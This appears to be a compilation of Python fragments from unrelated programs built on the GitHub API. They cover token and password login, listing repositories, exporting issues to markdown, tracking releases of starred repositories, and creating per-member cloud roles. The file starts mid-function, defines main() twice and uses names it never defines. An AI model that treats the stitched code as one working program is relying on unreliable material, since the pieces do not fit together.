    repo = porcelain.init(config_folder)
    porcelain.add(repo)
    porcelain.commit(repo, "A sample commit")
    porcelain.remote_add(repo, ".yoda", remote_url)
    porcelain.push(repo, remote_url)
def get_repos(key, org, repo, url):
    """Return the repositories selected by *org* and *repo*.

    *url*, when truthy, is used as the API base URL. The owner is
    organization *org*, or the authenticated user when *org* is falsy. With
    a truthy *repo* a one-element list holding that repository is returned;
    otherwise the result of the owner's ``get_repos()``.
    """
    client = Github(key, base_url=url) if url else Github(key)
    owner = client.get_organization(login=org) if org else client.get_user()
    return [owner.get_repo(repo)] if repo else owner.get_repos()
def _get_current_repo(github, repo, remote='origin'):
    """
    Looks up the github repository that the given remote of a local repo points at

    :param Github github:
    :param Repo repo:
    :param unicode remote: name of the remote to inspect
    :return: The github repository associated with the provided repo
    :rtype: github.Repository.Repository
    """
    owner, name = _get_org_and_name_from_remote(repo.remotes[remote])
    full_name = '{0}/{1}'.format(owner, name)
    return github.get_repo(full_name)
def _instantiate_github(username):
    """
    Gets an authenticated github object together with a new authorization.
    If the password is rejected the user is asked for it again; if two-factor
    authentication is required the user is asked for a one-time code.

    :param unicode username:
    :return: the github client and the authorization that was created
    :rtype: tuple
    :raises AuthenticationException: after the third rejected password
    """
    password = get_github_password(username)
    attempts = 0
    while True:
        attempts += 1
        github = Github(login_or_token=username, password=password)
        try:
            auth = github.get_user().create_authorization(
                scopes=['repo'],
                note='github-reviewboard-sync {0}'.format(str(uuid4())))
        except BadCredentialsException:
            _LOG.error('The password was not valid for "{0}"'.format(username))
            if attempts == 3:
                raise AuthenticationException('Failed to authenticate three times. '
                                              'Is "{0}" the correct username?'.format(username))
            password = get_github_password(username, refresh=True)
        except TwoFactorException:
            user = github.get_user()
            onetime_password = input('Github 2-Factor code: ')
            authorization = user.create_authorization(
                scopes=['repo'],
                note='github-reviewboard-sync {0}'.format(str(uuid4())),
                onetime_password=onetime_password)
            # This path hands back a client built from the new token.
            return Github(authorization.token), authorization
        else:
            return github, auth
def main():
    """Print recent releases and tags of the repositories a user has starred.

    The user comes from the ``GH_USER`` environment variable, falling back
    to ``USER``. The token comes from ``GH_TOKEN``, then ``TOKEN``, then
    ``get_token()``. A release or tag counts as recent when it is less than
    ``DAYS`` days older than ``NOW``. Repositories with at least one recent
    entry are printed through ``format_repo``.
    """
    user_name = os.environ.get('GH_USER') or USER
    logging.info("tracking stars for user {}".format(user_name))
    logging.info("If this is not your username, change it in the python file")

    token = os.environ.get('GH_TOKEN') or TOKEN or get_token()
    # Look up the resolved name: passing the USER constant here would
    # ignore GH_USER even though it was just logged as the tracked user.
    user = Github(token).get_user(user_name)

    for repo in user.get_starred():
        repo_ = {
            'name': repo.full_name,
            'description': repo.description,
            'releases': list(),
        }
        logging.info("getting {}".format(repo.full_name))

        for release in repo.get_releases():
            release_date = parse_date(release.raw_data['published_at'])
            if NOW - release_date < dt.timedelta(days=DAYS):
                repo_['releases'].append(release.raw_data)
            else:
                break  # TODO XXX we assume, that those releases are ordered

        for tag in repo.get_tags():
            sha = tag.raw_data['commit']['sha']
            commit = repo.get_commit(sha)
            tag_date = parse_date(commit.raw_data['commit']['author']['date'])
            if NOW - tag_date < dt.timedelta(days=DAYS):
                # Skip tags that already appear as a release.
                if tag.name not in [r['name'] for r in repo_['releases']]:
                    tag.raw_data['tag_name'] = ''
                    tag.raw_data['published_at'] = commit.raw_data['commit']['author']['date']
                    repo_['releases'].append(tag.raw_data)
            else:
                break

        if repo_['releases']:
            print(format_repo(repo_))
def parse_args(args):
    """Parse the exporter's command line and return the argparse namespace.

    Positionals: ``repo`` and ``outpath``. Options: ``-l/--login`` (stored
    as ``login_user``) and ``-t/--token`` (stored as ``token``).
    """
    cli = argparse.ArgumentParser(
        description=DESCRIPTION,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    # TODO - validate this is in correct format.
    cli.add_argument(
        'repo',
        help='Github repo to export, in format "owner/repo_name".',
        type=str,
        action='store',
    )
    cli.add_argument(
        'outpath',
        help='Path to write exported issues.',
        type=str,
        action='store',
    )
    cli.add_argument(
        '-l', '--login',
        help='Prompt to login as this Github user. If provided, this takes '
             'precedence over any token found in the environment. If not '
             'provided and no token is found, you will be prompted to login as '
             'the repository owner.',
        type=str,
        action='store',
        dest='login_user',
    )
    cli.add_argument(
        '-t', '--token',
        help='Automatically login with this Github API token. If --login is '
             'provided, this is ignored.',
        type=str,
        action='store',
        dest='token',
    )

    return cli.parse_args(args)
def export_issues_to_markdown_file(repo, outpath):
    """Export the issues of *repo* to a UTF-8 markdown file at *outpath*.

    Closed pull requests are left out. An issue whose inspection or
    formatting raises is reported with a traceback and skipped, so one bad
    issue does not abort the export. Returns ``None``.
    """
    formatted_issues = []
    for issue in repo.get_issues(state='all'):
        # The Github API includes pull requests as "issues". Skip
        # closed PRs, as they will add a lot of noise to the export.
        try:
            if issue.pull_request and issue.state.lower() == 'closed':
                continue
        except Exception:
            # `Exception`, not a bare except: Ctrl-C must still be able to
            # stop a long export.
            traceback.print_exc()
            print("Caught exception checking whether issue is PR, skipping")
            continue

        # Process the issue (a single attempt) and append it to the main
        # issue list.
        try:
            formatted_issue = process_issue_to_markdown(issue)
        except Exception:
            traceback.print_exc()
            print("Couldn't process issue due to exceptions, skipping")
            continue
        else:
            formatted_issues.append(formatted_issue)

    full_markdown_export = templates_markdown.BASE.format(
        repo_name=repo.full_name,
        repo_url=repo.html_url,
        issues="\n".join(formatted_issues),
        date=datetime.datetime.now().strftime('%Y.%m.%d at %H:%M:%S')
    )

    print("Exported {} issues".format(len(formatted_issues)))
    print("Writing to file: {}".format(outpath))

    with open(outpath, 'wb') as out:
        out.write(full_markdown_export.encode('utf-8'))
    return None
def github_login(login_user=None, token=None, fallback_user=None):
    """Return a GitHub client, preferring an explicit login over a token.

    Order of precedence: *login_user* (password prompt), then *token*, then
    *fallback_user* (password prompt). At least one must be given. The
    client is created with ``per_page=100``.
    """
    assert login_user or token or fallback_user
    per_page = 100

    if token and not login_user:
        return Github(login_or_token=token, per_page=per_page)

    # Both remaining paths prompt for a password and differ only in the
    # account name used.
    account = login_user if login_user else fallback_user
    password = getpass.getpass("Github password for {} :".format(account))
    return Github(login_or_token=account, password=password, per_page=per_page)
def print_rate_limit(gh):
    """Print the raw data of the client's current rate limit."""
    rate = gh.get_rate_limit().rate
    print("Github API rate limit: {}".format(rate.raw_data))
def github_from_request(request):
    """Return a GitHub client for the requesting user.

    Uses the access token stored in the user's ``github-org`` social-auth
    entry.
    """
    social = request.user.social_auth.get(provider='github-org')
    access_token = social.extra_data['access_token']
    return github.Github(access_token)
def main():
    """Create roles, buckets and bucket policies for the organization.

    ``create_user_role`` is called with every member login. Then
    ``create_team_bucket`` is called with every team slug, and
    ``attach_bucket_policy`` for every (team slug, member login) pair.
    """
    org = Github(GITHUB_TOKEN).get_organization(GITHUB_ORG)

    for person in org.get_members():
        create_user_role(person.login)

    for team in org.get_teams():
        create_team_bucket(team.slug)
        for person in team.get_members():
            attach_bucket_policy(team.slug, person.login)